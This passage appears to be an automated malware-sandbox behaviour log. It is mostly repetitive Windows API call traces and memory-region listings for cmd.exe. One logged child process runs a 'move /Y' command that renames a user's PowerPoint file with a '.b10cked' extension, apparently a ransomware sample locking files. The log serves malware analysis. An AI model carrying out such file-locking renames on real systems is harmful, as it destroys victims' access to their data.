nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.712] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.713] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.714] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x32, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] GetFileType (hFile=0x4c) returned 0x1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] GetFileType (hFile=0x4c) returned 0x1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x32, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.716] _close (_FileHandle=4) returned 0 [0235.717] FindNextFileW (in: hFindFile=0x190e50, lpFindFileData=0x14f34c | out: lpFindFileData=0x14f34c) returned 0 [0235.717] GetLastError () returned 0x12 [0235.717] FindClose (in: hFindFile=0x190e50 | out: hFindFile=0x190e50) returned 1 [0235.717] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.718] _close (_FileHandle=3) returned 0 [0235.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.718] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.718] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.718] SetConsoleInputExeNameW () returned 0x1 [0235.718] GetConsoleOutputCP () returned 0x1b5 [0235.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.719] exit (_Code=0) Process: id = "641" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a60" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35118 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35119 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35120 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35121 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35122 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35123 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35124 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35125 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35126 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35127 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35139 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35140 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35141 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35142 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 35143 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35144 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35145 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35146 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35147 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35148 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35149 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35150 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35151 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35152 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 35153 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35154 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35155 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35156 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35157 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35158 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35159 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 35160 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 35161 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 881 os_tid = 0xd50 [0234.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fcf4 | out: lpSystemTimeAsFileTime=0x22fcf4*(dwLowDateTime=0xbf32b0c0, dwHighDateTime=0x1d440a9)) [0234.445] GetCurrentProcessId () returned 0x9b4 [0234.445] GetCurrentThreadId () returned 0xd50 [0234.446] GetTickCount () returned 0x40646 [0234.446] QueryPerformanceCounter (in: lpPerformanceCount=0x22fcec | out: lpPerformanceCount=0x22fcec*=29123476120) returned 1 [0234.446] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.446] __set_app_type (_Type=0x1) [0234.446] __p__fmode () returned 0x76b331f4 [0234.446] __p__commode () returned 0x76b331fc [0234.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.446] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.446] GetCurrentThreadId () returned 0xd50 [0234.446] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd50) returned 0x38 [0234.447] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.447] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.447] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.447] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.447] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fc84 | out: phkResult=0x22fc84*=0x0) returned 0x2 [0234.447] VirtualQuery (in: lpAddress=0x22fcbb, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0234.447] GetConsoleOutputCP () returned 0x1b5 [0234.447] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.447] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.447] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.448] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.448] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.448] GetEnvironmentStringsW () returned 0x250150* [0234.448] FreeEnvironmentStringsW (penv=0x250150) returned 1 [0234.448] GetEnvironmentStringsW () returned 0x250150* [0234.448] FreeEnvironmentStringsW (penv=0x250150) returned 1 [0234.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ebf4 | out: phkResult=0x22ebf4*=0x40) returned 0x0 [0234.448] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x78, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.448] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", 